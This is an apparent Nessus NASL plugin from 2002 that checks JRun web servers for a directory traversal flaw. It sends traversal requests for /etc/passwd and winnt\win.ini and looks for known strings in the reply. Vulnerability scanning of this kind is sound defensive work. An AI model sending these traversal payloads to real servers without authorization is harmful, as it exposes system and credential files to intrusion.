#
# This script was written by H D Moore
#


if(description)
{
    script_id(10997);
    script_version ("$Revision: 1.1 $");
    name["english"] = "JRun directory traversal";
    name["francais"] = "JRun directory traversal";
    script_name(english:name["english"], francais:name["francais"]);

    desc["english"] = " 
The JRun web server is vulnerable to a directory traversal
attack. This allows an attacker to view the contents of any
file on the system.

Solution : Depends on what version they are running.
Risk factor : High";


    script_description(english:desc["english"], francais:desc["francais"]);

    summary["english"] = "Attempts directory traversal attack";
    summary["francais"] = "Attempts directory traversal attack";

    script_summary(english:summary["english"], francais:summary["francais"]);

    script_category(ACT_GATHER_INFO);


    script_copyright(english:"This script is Copyright (C) 2002 Digital Defense Inc.",
	    francais:"Ce script est Copyright (C) 2002 Digital Defense Inc.");
    family["english"] = "CGI abuses";
    family["francais"] = "Abus de CGI";
    script_family(english:family["english"], francais:family["francais"]);
    script_dependencie("find_service.nes", "no404.nasl", "http_version.nasl");
    script_require_ports("Services/www", 8000);
    script_require_keys("www/jrun");
    exit(0);
}

#
# The script code starts here
#


req_unx = "/../../../../../../../../etc/passwd"; pat_unx = "root:";
req_win = "/..\..\..\..\..\..\..\..\winnt\win.ini"; pat_win = "[fonts]";

port = get_kb_item("Services/www");
if(!port)port = 8000;

# Check to see if a traversal vuln has already been found
wkey = string("web/traversal/", port);
trav = get_kb_item(name:wkey);
if (trav) exit(0);

if(get_port_state(port))
{
    soc = open_sock_tcp(port);
    req = http_get(item:req_unx, port:port);      
    send(socket:soc, data:req);
    res = recv(socket:soc, length:2000, timeout:20);
    close(soc);
    
    if(pat_unx >< res)
    {
        wkey = string("web/traversal/", port);
        set_kb_item(name:wkey, value:TRUE);
        security_hole(port);
        exit(0);
    }
    
    soc = open_sock_tcp(port);
    req = http_get(item:req_win, port:port);      
    send(socket:soc, data:req);
    res = recv(socket:soc, length:2000, timeout:20);
    close(soc);

    if(pat_win >< res)
    {
        wkey = string("web/traversal/", port);
        set_kb_item(name:wkey, value:TRUE);    
        security_hole(port);
        exit(0);
    }  
}
 
